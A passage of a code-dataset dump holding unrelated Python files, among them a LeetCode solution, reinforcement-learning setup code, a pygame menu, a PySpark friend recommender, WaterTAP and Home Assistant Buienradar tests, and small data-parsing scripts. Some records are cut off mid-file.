lees_stationgegevens()","sub_path":"iNStagram/file_io/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"115905606","text":"#\n# @lc app=leetcode id=31 lang=python3\n#\n# [31] Next Permutation\n#\n\n# @lc code=start\nclass Solution:\n    def nextPermutation(self, nums: List[int]) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        i = j = len(nums)-1\n        while i>0 and nums[i-1]>=nums[i]:\n            i-=1\n        if i ==0 :\n            nums.reverse()\n            return\n        k = i-1\n        while j>k and nums[j]<=nums[k]:\n            j-=1\n        nums[k],nums[j] = nums[j],nums[k]\n        l,r = k+1,len(nums)-1\n        while l
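The nextPermutation record above is cut off mid-statement at its final while. For reference, the standard tail of the algorithm is an in-place reversal of the suffix after the swap; the sketch below shows that conventional closing step under the l/r two-pointer setup already in place. It is a reconstruction of the usual ending, not the original author's lines.

def reverse_tail(nums, l, r):
    # Standard next-permutation closing loop: reverse nums[l..r] in place.
    while l < r:
        nums[l], nums[r] = nums[r], nums[l]
        l += 1
        r -= 1

nums = [2, 3, 1]  # state after the swap step for input [1, 3, 2] (k = 0)
reverse_tail(nums, 1, len(nums) - 1)
print(nums)  # [2, 1, 3] -- the next permutation of [1, 3, 2]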
iterable\nb='rfoireoosjjfototieldkfkorpwprkgptktprkptktjtootktptktpktktotktotkotktototptktootptoro'\nbc = Counter(b)\nprint(bc) # --> Counter({'t': 24, 'o': 17, 'k': 14, 'p': 9, 'r': 6, 'f': 3, 'j': 3, 'i': 2,\n\t\t\t\t# 'e': 2, 's': 1, 'l': 1, 'd': 1, 'w': 1, 'g': 1})\n\n# Counter objects support dictionary methods.\n# Counters can be used to check if two words are Anagrams\na = 'anagram'\nc = 'gramana'\nprint(Counter(a)==Counter(c))\n\n","sub_path":"Collections.py","file_name":"Collections.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"508280570","text":"import numpy as np\nfrom baselines import logger\nfrom baselines.common import set_global_seeds\nfrom baselines.common.mpi_adam import MpiAdam\n\nimport multiagent.scenarios as scenarios\nfrom multiagent.model_ADMM import Model\nfrom multiagent.runner import Runner\nfrom multiagent.policy_ADMM import build_policy\n\nimport gym\nfrom baselines.bench import Monitor\nfrom baselines.bench.monitor import load_results\nfrom baselines.common import retro_wrappers, set_global_seeds\nfrom baselines.common.vec_env.dummy_vec_env import DummyVecEnv\nfrom baselines.common.vec_env.subproc_vec_env import SubprocVecEnv\n\ntry:\n from mpi4py import MPI\nexcept ImportError:\n MPI = None\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nclass ClipActionsWrapper(gym.Wrapper):\n def step(self, action):\n # try:\n # low, high = self.env.unwrapped._feasible_action()\n # except:\n # low, high = self.action_space.low, self.action_space.high\n\n # import numpy as np\n # action = np.nan_to_num(action)\n # action = np.clip(action, low, high)\n return self.env.step(action)\n\n def reset(self, **kwargs):\n return self.env.reset(**kwargs)\n\nclass MAPPO(object):\n \"\"\" Paralell CPO algorithm \"\"\"\n def __init__(self, env_id, nsteps, gamma=0.995, lam=0.95, ent_coef=0.0, admm_iter=10, cliprange=0.2, \n lr=3e-4, vf_iters=3, beta=1.0, alpha=1.0, rho=100.0, eta=1.0, num_env=1, reward_scale=1.0, \n seed=None, load_path=None, logger_dir=None, force_dummy=False, info_keywords=(), **network_kwargs):\n # Setup stuff\n set_global_seeds(seed)\n np.set_printoptions(precision=5)\n\n # parameters\n self.lr = lr\n self.cliprange = cliprange\n\n scenario = scenarios.load('{}.py'.format(env_id)).Scenario()\n world = scenario.make_world()\n\n if hasattr(world.agents[0], 'adversary'):\n good_agents = [agent for agent in world.agents if not agent.adversary]\n world.n_agt = len(good_agents)\n world.n_adv = len(world.agents) - world.n_agt\n world.n = world.n_agt+world.n_adv\n else:\n world.n_agt = 0\n world.n_adv = len(world.agents)\n world.n = world.n_agt+world.n_adv\n self.n_agt, self.n_adv, self.n = world.n_agt, world.n_adv, world.n\n\n # Environment\n if num_env == 1:\n env = self.make_env(env_id, seed, logger_dir=logger_dir, reward_scale=1.0, mpi_rank=0, subrank=0, info_keywords=info_keywords)\n else:\n env = self.make_vec_env(env_id, seed, logger_dir=logger_dir, num_env=num_env, reward_scale=reward_scale,\n force_dummy=force_dummy, info_keywords=info_keywords)\n self.env = env\n\n # create interactive policies for each agent\n self.policies = policies= [build_policy(env, world, i, network_kwargs['n_hiddens']) for i in range(len(world.agents))]\n # model\n self.model = model = Model(env=env, world=world, policies=policies, nsteps=nsteps, load_path=None, admm_iter=admm_iter, \n ent_coef=ent_coef, vf_iters=vf_iters, alpha=alpha, rho=rho, beta=beta, eta=eta)\n # runner\n 
self.runner = Runner(env=env, model=model, nsteps=nsteps, gamma=gamma, lam=lam)\n\n def make_env(self, env_id, seed, logger_dir=None, reward_scale=1.0, mpi_rank=0, subrank=0, info_keywords=()):\n \"\"\"\n Create a wrapped, monitored gym.Env for safety.\n \"\"\"\n scenario = scenarios.load('{}.py'.format(env_id)).Scenario()\n world = scenario.make_world()\n env_dict = {\n \"world\": world,\n 'reset_callback': scenario.reset_world,\n 'reward_callback': scenario.reward, \n 'observation_callback': scenario.observation,\n 'info_callback': None,\n 'done_callback': scenario.done, \n 'shared_viewer': True\n }\n env = gym.make('MultiAgent-v0', **env_dict)\n env.seed(seed + subrank if seed is not None else None)\n env = Monitor(env,\n logger_dir and os.path.join(logger_dir, str(mpi_rank) + '.' + str(subrank)),\n allow_early_resets=True,\n info_keywords=info_keywords)\n env = ClipActionsWrapper(env)\n if reward_scale != 1.0:\n from baselines.common.retro_wrappers import RewardScaler\n env = RewardScaler(env, reward_scale)\n return env\n\n def make_vec_env(self, env_id, seed, logger_dir=None, reward_scale=1.0, num_env=1, force_dummy=False, info_keywords=()):\n \"\"\"\n Create a wrapped, monitored SubprocVecEnv for Atari and MuJoCo.\n \"\"\"\n mpi_rank = MPI.COMM_WORLD.Get_rank() if MPI else 0\n seed = seed + 10000 * mpi_rank if seed is not None else None\n def make_thunk(rank, initializer=None):\n return lambda: self.make_env(\n env_id,\n seed,\n logger_dir=logger_dir,\n reward_scale=reward_scale,\n mpi_rank=mpi_rank,\n subrank=rank,\n info_keywords=info_keywords,\n )\n set_global_seeds(seed)\n\n if not force_dummy and num_env > 1:\n return SubprocVecEnv([make_thunk(i) for i in range(num_env)])\n else:\n return DummyVecEnv([make_thunk(i) for i in range(num_env)])\n","sub_path":"multiagent/backup/mappo_ADMM.py","file_name":"mappo_ADMM.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379424698","text":"import sys\nimport pygame\nfrom pygame.locals import *\n\n\nclass PopupMenu:\n def __init__(self):\n self.font_family = 'hgゴシックehgpゴシックehgsゴシックe'\n self.font_size = 20\n self.item_margin_y = 10\n self.menu_pad = 10\n self.menu_bg_color = (255, 255, 255)\n self.font_color = (50, 50, 50)\n\n def max_width(self, context_items):\n mlen = 0\n for itm in context_items:\n mlen = max(mlen, len(itm))\n return mlen\n\n def show(self, surface, ev, context_items):\n itemslen = len(context_items)\n\n width = self.max_width(context_items)*self.font_size + (self.menu_pad*2)\n height = itemslen*(self.font_size+self.item_margin_y) + (self.menu_pad*2)\n menu_surf = pygame.Surface((width, height))\n menu_rect = menu_surf.get_rect()\n menu_rect.left = ev.pos[0]\n menu_rect.top = ev.pos[1]\n\n # create menu item surface list\n sysfont = pygame.font.SysFont(self.font_family, self.font_size)\n menu_item_surfs = []\n for stritem in context_items:\n font_surf = sysfont.render(stritem, True, self.font_color)\n menu_item_surfs.append(font_surf)\n\n def contains(e):\n for i, item in enumerate(menu_item_surfs):\n item_rect = item.get_rect()\n left = ev.pos[0] + self.menu_pad\n top = ev.pos[1] + self.menu_pad + i*(self.font_size + self.item_margin_y)\n right = left + item_rect.right\n bottom = top + item_rect.bottom\n mx = e.pos[0]\n my = e.pos[1]\n if (mx >= left and mx <= right) and (my >= top and my <= bottom):\n return i, item\n return None, None\n\n while True:\n pygame.time.wait(30)\n menu_surf.fill(self.menu_bg_color)\n\n for i, 
item in enumerate(menu_item_surfs):\n item_rect = item.get_rect()\n item_rect.left = self.menu_pad\n item_rect.top = self.menu_pad + i*(self.font_size + self.item_margin_y)\n menu_surf.blit(item, item_rect)\n\n surface.blit(menu_surf, menu_rect)\n pygame.display.update()\n\n for e in pygame.event.get():\n if e.type == QUIT:\n pygame.quit()\n sys.exit(0)\n elif e.type == KEYDOWN:\n if e.key == K_ESCAPE:\n return None\n elif e.type == MOUSEBUTTONDOWN and e.button == 1:\n i, item = contains(e)\n if i is not None:\n return context_items[i]\n return None\n","sub_path":"core/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"521850324","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyspark\n\nfrom pyspark.sql import *\nfrom pyspark.sql.functions import *\nfrom pyspark import SparkContext, SparkConf\n\nfrom operator import itemgetter\n\ndef extract_second_friend(tuple):\n firsts = tuple[1].split(\",\")\n\n # ignore user with no friend\n if firsts[0] == \"\":\n return []\n \n firsts.sort(key=lambda item: int(item))\n seconds = []\n for user in firsts:\n for second in firsts:\n if user != second:\n seconds.append([\"%s,%s\" % (user, second), 1])\n return seconds\n\ndef transform_pairkey_to_user_friend(tuple):\n pairkey = tuple[0].split(\",\")\n return (pairkey[0], [int(pairkey[1]), tuple[1]])\n\ndef sort_seconds_by_rank(v):\n ordered = list(v)\n ordered.sort(key=itemgetter(0))\n ordered.sort(reverse=True,key=itemgetter(1))\n return \",\".join(map(lambda x: str(x[0]), ordered[:10]))\n\nfilename = \"../hw1-bundle/q1/data/soc-LiveJournal1Adj.txt\"\n\n# create the session\n#conf = SparkConf().setMaster('spark://jaehong-VM0:7077').setAppName('test')\nconf = SparkConf().setMaster('local').setAppName('test')\n\n# create the context\nsc = pyspark.SparkContext(conf=conf)\nspark = SparkSession.builder.getOrCreate()\n\ndist_data = sc.parallelize(sc.textFile(filename).map(lambda x: x.split(\"\\t\")).collect())\nlonely_users = dist_data.filter(lambda x: x[1] == \"\")\n#user_list = dist_data.map(lambda x: x[0])\n\nsecond_hop_friend = dist_data.flatMap(extract_second_friend)\nmutual_rank = second_hop_friend.reduceByKey(lambda a, b: a+b).map(transform_pairkey_to_user_friend)\nrecommand_list = mutual_rank.groupByKey().mapValues(sort_seconds_by_rank)\n\nresult_data = recommand_list.union(lonely_users).sortBy(lambda x: int(x[0])).map(lambda x: \"\\t\".join(str(d) for d in x))\noutput_file = open(\"q1_output.txt\", 'w')\noutput_file.write(\"\\n\".join(result_data.collect()))\noutput_file.write(\"\\n\")\noutput_file.close()\n","sub_path":"hw1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190382901","text":"###############################################################################\n# WaterTAP Copyright (c) 2021, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National\n# Laboratory, National Renewable Energy Laboratory, and National Energy\n# Technology Laboratory (subject to receipt of any required approvals from\n# the U.S. Dept. of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. 
These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#\n###############################################################################\nimport sys\nimport pytest\nfrom io import StringIO\n\nfrom pyomo.environ import (\n ConcreteModel,\n TransformationFactory,\n assert_optimal_termination,\n)\nfrom pyomo.network import Arc\nfrom pyomo.util.check_units import assert_units_consistent\n\nfrom idaes.core import FlowsheetBlock\nfrom idaes.core.util import get_solver\nfrom idaes.core.util.model_statistics import degrees_of_freedom\nimport idaes.core.util.scaling as iscale\nimport idaes.logger as idaeslog\nfrom idaes.core.util.initialization import propagate_state\n\n# Import components\nfrom watertap.unit_models.mvc.components import Evaporator\nfrom watertap.unit_models.mvc.components import Compressor\n\n# Import property packages\nimport watertap.property_models.seawater_prop_pack as props_sw\nimport watertap.property_models.water_prop_pack as props_w\n\n\ndef build(m):\n # Properties\n m.fs.properties_feed = props_sw.SeawaterParameterBlock()\n m.fs.properties_vapor = props_w.WaterParameterBlock()\n\n # Evaporator\n m.fs.evaporator = Evaporator(\n default={\n \"property_package_feed\": m.fs.properties_feed,\n \"property_package_vapor\": m.fs.properties_vapor,\n }\n )\n # Compressor\n m.fs.compressor = Compressor(default={\"property_package\": m.fs.properties_vapor})\n\n # Connections\n m.fs.s01 = Arc(\n source=m.fs.evaporator.outlet_vapor, destination=m.fs.compressor.inlet\n )\n m.fs.s02 = Arc(\n source=m.fs.compressor.outlet, destination=m.fs.evaporator.inlet_condenser\n )\n TransformationFactory(\"network.expand_arcs\").apply_to(m)\n\n\ndef scale(m):\n m.fs.properties_feed.set_default_scaling(\n \"flow_mass_phase_comp\", 1, index=(\"Liq\", \"H2O\")\n )\n m.fs.properties_feed.set_default_scaling(\n \"flow_mass_phase_comp\", 1e2, index=(\"Liq\", \"TDS\")\n )\n m.fs.properties_vapor.set_default_scaling(\n \"flow_mass_phase_comp\", 1, index=(\"Vap\", \"H2O\")\n )\n m.fs.properties_vapor.set_default_scaling(\n \"flow_mass_phase_comp\", 1, index=(\"Liq\", \"H2O\")\n )\n # Evaporator\n iscale.set_scaling_factor(m.fs.evaporator.area, 1e-3)\n iscale.set_scaling_factor(m.fs.evaporator.U, 1e-3)\n iscale.set_scaling_factor(m.fs.evaporator.delta_temperature_in, 1e-1)\n iscale.set_scaling_factor(m.fs.evaporator.delta_temperature_out, 1e-1)\n iscale.set_scaling_factor(m.fs.evaporator.lmtd, 1e-1)\n # iscale.set_scaling_factor(m.fs.evaporator.heat_transfer, 1e-6)\n # Compressor\n iscale.set_scaling_factor(m.fs.compressor.control_volume.work, 1e-6)\n\n iscale.calculate_scaling_factors(m)\n\n\ndef specify(m):\n # state variables\n # Feed inlet\n m.fs.evaporator.inlet_feed.flow_mass_phase_comp[0, \"Liq\", \"H2O\"].fix(1)\n m.fs.evaporator.inlet_feed.flow_mass_phase_comp[0, \"Liq\", \"TDS\"].fix(0.05)\n m.fs.evaporator.inlet_feed.temperature[0].fix(273.15 + 50.52) # K\n m.fs.evaporator.inlet_feed.pressure[0].fix(1e5) # Pa\n\n m.fs.evaporator.outlet_vapor.flow_mass_phase_comp[0, \"Vap\", \"H2O\"].fix(0.5)\n m.fs.evaporator.U.fix(1e3) # W/K-m^2\n m.fs.evaporator.area.fix(100) # m^2\n\n m.fs.compressor.pressure_ratio.fix(2)\n m.fs.compressor.efficiency.fix(0.8)\n\n\ndef initialize(m):\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Vap\", \"H2O\"].fix(0.5)\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Liq\", \"H2O\"].fix(1e-8)\n m.fs.evaporator.inlet_condenser.temperature[0].fix(400) # K\n m.fs.evaporator.inlet_condenser.pressure[0].fix(0.5e5) 
# Pa\n\n m.fs.evaporator.initialize(outlvl=idaeslog.INFO_HIGH)\n\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Vap\", \"H2O\"].unfix()\n m.fs.evaporator.inlet_condenser.flow_mass_phase_comp[0, \"Liq\", \"H2O\"].unfix()\n m.fs.evaporator.inlet_condenser.temperature[0].unfix() # K\n m.fs.evaporator.inlet_condenser.pressure[0].unfix() # Pa\n\n propagate_state(m.fs.s01)\n m.fs.compressor.initialize(outlvl=idaeslog.INFO_HIGH)\n\n\n@pytest.mark.requires_idaes_solver\n@pytest.mark.component\ndef test_mvc():\n m = ConcreteModel()\n m.fs = FlowsheetBlock(default={\"dynamic\": False})\n\n build(m)\n assert_units_consistent(m)\n scale(m)\n specify(m)\n assert degrees_of_freedom(m) == 0\n\n initialize(m)\n\n solver = get_solver()\n results = solver.solve(m, tee=False)\n assert_optimal_termination(results)\n\n m.fs.compressor.report()\n m.fs.evaporator.condenser.report()\n m.fs.evaporator.display()\n brine_blk = m.fs.evaporator.feed_side.properties_brine[0]\n # evaporator values\n assert brine_blk.pressure.value == pytest.approx(2.2738e4, rel=1e-3)\n assert m.fs.evaporator.lmtd.value == pytest.approx(12.30, rel=1e-3)\n assert m.fs.evaporator.feed_side.heat_transfer.value == pytest.approx(\n 1.231e6, rel=1e-3\n )\n\n # compressor values\n compressed_blk = m.fs.compressor.control_volume.properties_out[0]\n assert m.fs.compressor.control_volume.work[0].value == pytest.approx(\n 5.843e4, rel=1e-3\n )\n assert compressed_blk.pressure.value == pytest.approx(4.548e4, rel=1e-3)\n assert compressed_blk.temperature.value == pytest.approx(412.98, rel=1e-3)\n\n # condenser values\n condensed_blk = m.fs.evaporator.condenser.control_volume.properties_out[0]\n assert m.fs.evaporator.condenser.control_volume.heat[0].value == pytest.approx(\n -1.231e6, rel=1e-3\n )\n assert condensed_blk.temperature.value == pytest.approx(337.95, rel=1e-3)\n","sub_path":"watertap/unit_models/mvc/tests/test_mvc.py","file_name":"test_mvc.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"248881285","text":"#!/usr/bin/python3\n\nfrom requests_html import HTMLSession\nimport argparse\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\ndef get_score(project_list, wordlist):\n\tscore = 0\n\tfor project in project_list:\n\t\t# print(project)\n\t\tif('tags' in project):\n\t\t\tif('Écologie' in project['tags']):\n\t\t\t\tscore += 2\n\t\t\tif('Agrimentation' in project['tags']):\n\t\t\t\tscore += 2\n\t\tif('abstract' in project):\n\t\t\tfor word in wordlist:\n\t\t\t\tif(word in project['abstract']):\n\t\t\t\t\tscore+=1\n\t# print(score)\n\treturn(len(project_list),score)\n\n\n# returns a list of projects\ndef get_projects(transiscope, city_code):\n\tcity_projects = []\n\tfor elmt in transiscope['data']:\n\t\tif(\"postalCode\" in elmt['address']):\n\t\t\tif(elmt['address']['postalCode']==city_code):\n\t\t\t\tcity_projects.append(elmt)\n\treturn city_projects\n\ndef parse_json(transiscope):\n\t'''ORGA DU JSON : \n\t\t- licence\n\t\t- ontology\n\t\t- data[] :\n\t\t\t- id\n\t\t\t- name\n\t\t\t- geo{}\n\t\t\t- sourceKey\n\t\t\t- address{}\n\t\t\t\t- streetAddress\n\t\t\t\t- addressLocality\n\t\t\t\t- postalCode\n\t\t\t\t- addressCountry\n\t\t\t- createdAt\n\t\t\t- updatedAt\n\t\t\t- categories[]\n\t\t\t- addressString\n\t\t\t- abstract\n\t\t\t- website\n\t\t\t- tags[]\n\t'''\n\tfor elmt in transiscope['data']:\n\t\tif(\"postalCode\" in elmt['address'] and 'tags' in 
elmt):\n\t\t\tprint(str(elmt['address']['postalCode'])+' : '+str(elmt['tags']))\n\ndef init_trans(db_filename):\n\twith open(db_filename, 'r') as file_db:\n\t\ttransiscope = json.load(file_db)\n\treturn transiscope\n\ndef get_city(transiscope, code,wordlist):\n\tproject_list = get_projects(transiscope,code)\n\ttransiscore,score_ecolo = get_score(project_list,wordlist)\n\treturn [transiscore, score_ecolo]\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='Script pour récupérer infos du transiscope')\n\tparser.add_argument('--db',help='required JSON file for testing')\n\targs = parser.parse_args()\n\ttransiscope = init_trans(args.db)\n\tparse_json(transiscope)\t\n\tproject_list = get_projects(transiscope,'95400')\n\twordlist = ['écologie','nature','transition','bio','biodiversité']\n\tget_score(project_list, wordlist)\n","sub_path":"transiscope.py","file_name":"transiscope.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"160007514","text":"from django.urls import path\nfrom . import views\n\napp_name = 'collate'\nurlpatterns = [\n path('', views.ImportFileView.as_view(), name='import'),\n path('create/', views.CreateEntitiesView.as_view(), name='create'),\n path('form/', views.index, name='index'),\n path('merge/', views.MergeValidationsView.as_view(), name='merge'),\n path('clone/', views.CloneValidationsView.as_view(), name='clone'),\n path('gta-short-url/', views.ParseShortUrlView.as_view(), name='gta-short-url'),\n path('test-run-check/', views.CheckTestRunExist.as_view(), name='test-run-check'),\n\n]\n","sub_path":"backend/reporting/api/collate/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190810838","text":"import os\nimport re\nimport odil\n\nclass FlatDICOMWriter(object):\n def __init__(self, root, iso_9660, transfer_syntax):\n self.root = root\n self.iso_9660 = iso_9660\n self.transfer_syntax = transfer_syntax\n self.files = []\n\n def __call__(self, data_set):\n if not os.path.isdir(self.root):\n os.makedirs(self.root)\n\n if self.iso_9660:\n filename = \"{:08d}.dcm\".format(1+len(os.listdir(self.root)))\n else:\n filename = data_set.as_string(\"SOPInstanceUID\")[0].decode()\n\n destination = os.path.join(self.root, filename)\n with odil.open(destination, \"wb\") as fd:\n odil.Writer.write_file(\n data_set, fd, odil.DataSet(), self.transfer_syntax)\n self.files.append(destination)\n","sub_path":"src/python/dicomifier/bruker_to_dicom/flat_dicom_writer.py","file_name":"flat_dicom_writer.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534351401","text":"\"\"\"The tests for generic camera component.\"\"\"\nimport asyncio\n\nfrom aiohttp.client_exceptions import ClientResponseError\n\nfrom homeassistant.const import HTTP_INTERNAL_SERVER_ERROR\nfrom homeassistant.setup import async_setup_component\nfrom homeassistant.util import dt as dt_util\n\n# An infinitesimally small time-delta.\nEPSILON_DELTA = 0.0000000001\n\n\ndef radar_map_url(dim: int = 512, country_code: str = \"NL\") -> str:\n \"\"\"Build map url, defaulting to 512 wide (as in component).\"\"\"\n return f\"https://api.buienradar.nl/image/1.0/RadarMap{country_code}?w={dim}&h={dim}\"\n\n\nasync def test_fetching_url_and_caching(aioclient_mock, hass, hass_client):\n 
\"\"\"Test that it fetches the given url.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\")\n\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert resp.status == 200\n assert aioclient_mock.call_count == 1\n body = await resp.text()\n assert body == \"hello world\"\n\n # default delta is 600s -> should be the same when calling immediately\n # afterwards.\n\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 1\n\n\nasync def test_expire_delta(aioclient_mock, hass, hass_client):\n \"\"\"Test that the cache expires after delta.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\")\n\n await async_setup_component(\n hass,\n \"camera\",\n {\n \"camera\": {\n \"name\": \"config_test\",\n \"platform\": \"buienradar\",\n \"delta\": EPSILON_DELTA,\n }\n },\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert resp.status == 200\n assert aioclient_mock.call_count == 1\n body = await resp.text()\n assert body == \"hello world\"\n\n await asyncio.sleep(EPSILON_DELTA)\n # tiny delta has passed -> should immediately call again\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 2\n\n\nasync def test_only_one_fetch_at_a_time(aioclient_mock, hass, hass_client):\n \"\"\"Test that it fetches with only one request at the same time.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\")\n\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp_1 = client.get(\"/api/camera_proxy/camera.config_test\")\n resp_2 = client.get(\"/api/camera_proxy/camera.config_test\")\n\n resp = await resp_1\n resp_2 = await resp_2\n\n assert (await resp.text()) == (await resp_2.text())\n\n assert aioclient_mock.call_count == 1\n\n\nasync def test_dimension(aioclient_mock, hass, hass_client):\n \"\"\"Test that it actually adheres to the dimension.\"\"\"\n aioclient_mock.get(radar_map_url(700), text=\"hello world\")\n\n await async_setup_component(\n hass,\n \"camera\",\n {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\", \"dimension\": 700}},\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert aioclient_mock.call_count == 1\n\n\nasync def test_belgium_country(aioclient_mock, hass, hass_client):\n \"\"\"Test that it actually adheres to another country like Belgium.\"\"\"\n aioclient_mock.get(radar_map_url(country_code=\"BE\"), text=\"hello world\")\n\n await async_setup_component(\n hass,\n \"camera\",\n {\n \"camera\": {\n \"name\": \"config_test\",\n \"platform\": \"buienradar\",\n \"country_code\": \"BE\",\n }\n },\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert aioclient_mock.call_count == 1\n\n\nasync def test_failure_response_not_cached(aioclient_mock, hass, hass_client):\n \"\"\"Test that it does not cache a failure response.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\", 
status=401)\n\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n await client.get(\"/api/camera_proxy/camera.config_test\")\n await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert aioclient_mock.call_count == 2\n\n\nasync def test_last_modified_updates(aioclient_mock, hass, hass_client):\n \"\"\"Test that it does respect HTTP not modified.\"\"\"\n # Build Last-Modified header value\n now = dt_util.utcnow()\n last_modified = now.strftime(\"%a, %d %m %Y %H:%M:%S GMT\")\n\n aioclient_mock.get(\n radar_map_url(),\n text=\"hello world\",\n status=200,\n headers={\"Last-Modified\": last_modified},\n )\n\n await async_setup_component(\n hass,\n \"camera\",\n {\n \"camera\": {\n \"name\": \"config_test\",\n \"platform\": \"buienradar\",\n \"delta\": EPSILON_DELTA,\n }\n },\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp_1 = await client.get(\"/api/camera_proxy/camera.config_test\")\n # It is not possible to check if header was sent.\n assert aioclient_mock.call_count == 1\n\n await asyncio.sleep(EPSILON_DELTA)\n\n # Content has expired, change response to a 304 NOT MODIFIED, which has no\n # text, i.e. old value should be kept\n aioclient_mock.clear_requests()\n # mock call count is now reset as well:\n assert aioclient_mock.call_count == 0\n\n aioclient_mock.get(radar_map_url(), text=None, status=304)\n\n resp_2 = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 1\n\n assert (await resp_1.read()) == (await resp_2.read())\n\n\nasync def test_retries_after_error(aioclient_mock, hass, hass_client):\n \"\"\"Test that it does retry after an error instead of caching.\"\"\"\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n aioclient_mock.get(radar_map_url(), text=None, status=HTTP_INTERNAL_SERVER_ERROR)\n\n # A 404 should not return data and throw:\n try:\n await client.get(\"/api/camera_proxy/camera.config_test\")\n except ClientResponseError:\n pass\n\n assert aioclient_mock.call_count == 1\n\n # Change the response to a 200\n aioclient_mock.clear_requests()\n aioclient_mock.get(radar_map_url(), text=\"DEADBEEF\")\n\n assert aioclient_mock.call_count == 0\n\n # http error should not be cached, immediate retry.\n resp_2 = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 1\n\n # Binary text can not be added as body to `aioclient_mock.get(text=...)`,\n # while `resp.read()` returns bytes, encode the value.\n assert (await resp_2.read()) == b\"DEADBEEF\"\n","sub_path":"tests/components/buienradar/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469275935","text":"# coding: utf-8\n\nimport os\nimport code\nimport lxml.html\n \ndef process():\n\tfor html in os.listdir('sources'):\n\t\twith open('pt-BR/%s' % html) as file:\n\t\t\tparsed = lxml.html.fromstring(file.read())\n\t\tps = parsed.cssselect('body p')\n\t\ttext = []\n\t\tfor p in ps:\n\t\t\tlines = [l.strip() for l in p.text_content().split('\\n')]\n\t\t\ttext.append(' '.join(lines))\n\t\t\ttext.append('')\n\t\tfname = os.path.splitext(html)[0]\n\t\twith open('en/%s.txt' % 
